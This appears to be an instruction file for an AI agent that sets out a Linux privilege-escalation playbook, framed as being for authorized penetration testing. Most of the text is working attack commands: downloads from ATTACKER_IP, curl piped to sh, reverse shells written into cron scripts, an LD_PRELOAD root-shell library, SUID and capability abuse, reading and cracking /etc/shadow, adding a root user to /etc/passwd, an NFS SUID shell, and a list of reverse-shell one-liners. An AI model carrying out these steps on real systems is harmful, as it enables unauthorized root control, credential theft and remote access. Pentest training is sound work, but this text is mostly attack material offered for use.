AUTHORIZED USE ONLY: Use this skill only for authorized security assessments, defensive validation, or controlled educational environments.

Linux Privilege Escalation

Purpose

Execute systematic privilege escalation assessments on Linux systems to identify and exploit misconfigurations, vulnerable services, and security weaknesses that allow elevation from low-privilege user access to root-level control. This skill enables comprehensive enumeration and exploitation of kernel vulnerabilities, sudo misconfigurations, SUID binaries, cron jobs, capabilities, PATH hijacking, and NFS weaknesses.

Inputs / Prerequisites

Required Access

• Low-privilege shell access to target Linux system
• Ability to execute commands (interactive or semi-interactive shell)
• Network access for reverse shell connections (if needed)
• Attacker machine for payload hosting and receiving shells

Technical Requirements

• Understanding of Linux filesystem permissions and ownership
• Familiarity with common Linux utilities and scripting
• Knowledge of kernel versions and associated vulnerabilities
• Basic understanding of compilation (gcc) for custom exploits

Recommended Tools

• LinPEAS, LinEnum, or Linux Smart Enumeration scripts
• Linux Exploit Suggester (LES)
• GTFOBins reference for binary exploitation
• John the Ripper or Hashcat for password cracking
• Netcat or similar for reverse shells

Outputs / Deliverables

Primary Outputs

• Root shell access on target system
• Privilege escalation path documentation
• System enumeration findings report
• Recommendations for remediation

Evidence Artifacts

• Screenshots of successful privilege escalation
• Command output logs demonstrating root access
• Identified vulnerability details
• Exploited configuration files

Core Workflow

Phase 1: System Enumeration

Basic System Information

Gather fundamental system details for vulnerability research:

# Hostname and system role
hostname

# Kernel version and architecture
uname -a

# Detailed kernel information
cat /proc/version

# Operating system details
cat /etc/issue
cat /etc/*-release

# Architecture
arch

User and Permission Enumeration

# Current user context
whoami
id

# Users with login shells
cat /etc/passwd | grep -v nologin | grep -v false

# Users with home directories
cat /etc/passwd | grep home

# Group memberships
groups

# Other logged-in users
w
who

Network Information

# Network interfaces
ifconfig
ip addr

# Routing table
ip route

# Active connections
netstat -antup
ss -tulpn

# Listening services
netstat -l

Process and Service Enumeration

# All running processes
ps aux
ps -ef

# Process tree view
ps axjf

# Services running as root
ps aux | grep root

Environment Variables

# Full environment
env

# PATH variable (for hijacking)
echo $PATH

Phase 2: Automated Enumeration

Deploy automated scripts for comprehensive enumeration:

# LinPEAS
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh

# LinEnum
./LinEnum.sh -t

# Linux Smart Enumeration
./lse.sh -l 1

# Linux Exploit Suggester
./les.sh

Transfer scripts to target system:

# On attacker machine
python3 -m http.server 8000

# On target machine
wget http://ATTACKER_IP:8000/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

Phase 3: Kernel Exploits

Identify Kernel Version

uname -r
cat /proc/version

Search for Exploits

# Use Linux Exploit Suggester
./linux-exploit-suggester.sh

# Manual search on exploit-db
searchsploit linux kernel [version]

Common Kernel Exploits

Compile and Execute

# Transfer exploit source
wget http://ATTACKER_IP/exploit.c

# Compile on target
gcc exploit.c -o exploit

# Execute
./exploit

Phase 4: Sudo Exploitation

Enumerate Sudo Privileges

sudo -l

GTFOBins Sudo Exploitation

Reference https://gtfobins.github.io for exploitation commands:

# Example: vim with sudo
sudo vim -c ':!/bin/bash'

# Example: find with sudo
sudo find . -exec /bin/sh \; -quit

# Example: awk with sudo
sudo awk 'BEGIN {system("/bin/bash")}'

# Example: python with sudo
sudo python -c 'import os; os.system("/bin/bash")'

# Example: less with sudo
sudo less /etc/passwd
!/bin/bash

LD_PRELOAD Exploitation

When env_keep includes LD_PRELOAD:

// shell.c
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
    unsetenv("LD_PRELOAD");
    setgid(0);
    setuid(0);
    system("/bin/bash");
}

# Compile shared library
gcc -fPIC -shared -o shell.so shell.c -nostartfiles

# Execute with sudo
sudo LD_PRELOAD=/tmp/shell.so find

Phase 5: SUID Binary Exploitation

Find SUID Binaries

find / -type f -perm -04000 -ls 2>/dev/null
find / -perm -u=s -type f 2>/dev/null

Exploit SUID Binaries

Reference GTFOBins for SUID exploitation:

# Example: base64 for file reading
LFILE=/etc/shadow
base64 "$LFILE" | base64 -d

# Example: cp for file writing
cp /bin/bash /tmp/bash
chmod +s /tmp/bash
/tmp/bash -p

# Example: find with SUID
find . -exec /bin/sh -p \; -quit

Password Cracking via SUID

# Read shadow file (if base64 has SUID)
base64 /etc/shadow | base64 -d > shadow.txt
base64 /etc/passwd | base64 -d > passwd.txt

# On attacker machine
unshadow passwd.txt shadow.txt > hashes.txt
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt

Add User to passwd (if nano/vim has SUID)

# Generate password hash
openssl passwd -1 -salt new newpassword

# Add to /etc/passwd (using SUID editor)
newuser:$1$new$p7ptkEKU1HnaHpRtzNizS1:0:0:root:/root:/bin/bash

Phase 6: Capabilities Exploitation

Enumerate Capabilities

getcap -r / 2>/dev/null

Exploit Capabilities

# Example: python with cap_setuid
/usr/bin/python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'

# Example: vim with cap_setuid
./vim -c ':py3 import os; os.setuid(0); os.execl("/bin/bash", "bash", "-c", "reset; exec bash")'

# Example: perl with cap_setuid
perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/bash";'

Phase 7: Cron Job Exploitation

Enumerate Cron Jobs

# System crontab
cat /etc/crontab

# User crontabs
ls -la /var/spool/cron/crontabs/

# Cron directories
ls -la /etc/cron.*

# Systemd timers
systemctl list-timers

Exploit Writable Cron Scripts

# Identify writable cron script from /etc/crontab
ls -la /opt/backup.sh        # Check permissions
echo 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1' >> /opt/backup.sh

# If cron references non-existent script in writable PATH
echo -e '#!/bin/bash\nbash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1' > /home/user/antivirus.sh
chmod +x /home/user/antivirus.sh

Phase 8: PATH Hijacking

# Find SUID binary calling external command
strings /usr/local/bin/suid-binary
# Shows: system("service apache2 start")

# Hijack by creating malicious binary in writable PATH
export PATH=/tmp:$PATH
echo -e '#!/bin/bash\n/bin/bash -p' > /tmp/service
chmod +x /tmp/service
/usr/local/bin/suid-binary      # Execute SUID binary

Phase 9: NFS Exploitation

# On target - look for no_root_squash option
cat /etc/exports

# On attacker - mount share and create SUID binary
showmount -e TARGET_IP
mount -o rw TARGET_IP:/share /tmp/nfs

# Create and compile SUID shell
echo 'int main(){setuid(0);setgid(0);system("/bin/bash");return 0;}' > /tmp/nfs/shell.c
gcc /tmp/nfs/shell.c -o /tmp/nfs/shell && chmod +s /tmp/nfs/shell

# On target - execute
/share/shell

Quick Reference

Enumeration Commands Summary

uname -a

id

sudo -l

find / -perm -u=s -type f 2>/dev/null

getcap -r / 2>/dev/null

cat /etc/crontab

find / -writable -type d 2>/dev/null

cat /etc/exports

Reverse Shell One-Liners

# Bash
bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1

# Python
python -c 'import socket,subprocess,os;s=socket.socket();s.connect(("ATTACKER_IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"])'

# Netcat
nc -e /bin/bash ATTACKER_IP 4444

# Perl
perl -e 'use Socket;$i="ATTACKER_IP";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));connect(S,sockaddr_in($p,inet_aton($i)));open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");'

Key Resources

• GTFOBins: https://gtfobins.github.io
• LinPEAS: https://github.com/carlospolop/PEASS-ng
• Linux Exploit Suggester: https://github.com/mzet-/linux-exploit-suggester

Constraints and Guardrails

Operational Boundaries

• Verify kernel exploits in test environment before production use
• Failed kernel exploits may crash the system
• Document all changes made during privilege escalation
• Maintain access persistence only as authorized

Technical Limitations

• Modern kernels may have exploit mitigations (ASLR, SMEP, SMAP)
• AppArmor/SELinux may restrict exploitation techniques
• Container environments limit kernel-level exploits
• Hardened systems may have restricted sudo configurations

Legal and Ethical Requirements

• Written authorization required before testing
• Stay within defined scope boundaries
• Report critical findings immediately
• Do not access data beyond scope requirements

Examples

Example 1: Sudo to Root via find

Scenario: User has sudo rights for find command

$ sudo -l
User user may run the following commands:
    (root) NOPASSWD: /usr/bin/find

$ sudo find . -exec /bin/bash \; -quit
# id
uid=0(root) gid=0(root) groups=0(root)

Example 2: SUID base64 for Shadow Access

Scenario: base64 binary has SUID bit set

$ find / -perm -u=s -type f 2>/dev/null | grep base64
/usr/bin/base64

$ base64 /etc/shadow | base64 -d
root:$6$xyz...:18000:0:99999:7:::

# Crack offline with john
$ john --wordlist=rockyou.txt shadow.txt

Example 3: Cron Job Script Hijacking

Scenario: Root cron job executes writable script

$ cat /etc/crontab
* * * * * root /opt/scripts/backup.sh

$ ls -la /opt/scripts/backup.sh
-rwxrwxrwx 1 root root 50 /opt/scripts/backup.sh

$ echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' >> /opt/scripts/backup.sh

# Wait 1 minute
$ /tmp/bash -p
# id
uid=1000(user) gid=1000(user) euid=0(root)

Troubleshooting

which gcc

gcc -static

service cron status

When to Use

This skill is applicable to execute the workflow or actions described in the overview.